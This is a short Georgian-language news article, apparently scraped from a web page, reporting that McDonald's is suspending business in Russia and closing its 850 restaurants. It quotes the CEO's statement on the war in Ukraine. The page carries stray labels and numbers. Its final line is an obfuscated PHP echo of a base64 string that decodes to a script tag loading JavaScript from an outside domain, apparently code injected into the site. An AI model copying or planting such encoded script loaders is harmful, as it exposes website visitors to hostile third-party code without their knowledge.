celsiusi
ავერსი საქკაბელი
„მაკდონალდსი“ რუსეთში საქმიანობას აჩერებს და ყველა რესტორანს დროებით ხურავს. კომპანია რუსეთში 850 რესტორანს ფლობს.
 
„კონფლიქტი უკრაინაში და ჰუმანიტარული კრიზისი ევროპაში წარმოუდგენელ ტანჯვას აყენებს უდანაშაულო ადამიანებს. ჩვენ ვუერთდებით მთელ მსოფლიოს აგრესიისა და ძალადობის დაგმობაში და ვლოცულობთ მშვიდობისთვის“, – ნათქვამია „მაკდონალდსის“ აღმასრულებელი დირექტორის, კრის კემპჩინსკის განცხადებაში.
 
კომპანიის განცხადებით, რუსეთში „მაკდონალდსის“ დასაქმებულებისთვის ხელფასის გადახდას გააგრძელებენ. სულ რუსეთში სწრაფი კვების კომპანიას 62 ათასი ადამიანი ჰყავს დასაქმებული.
790
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");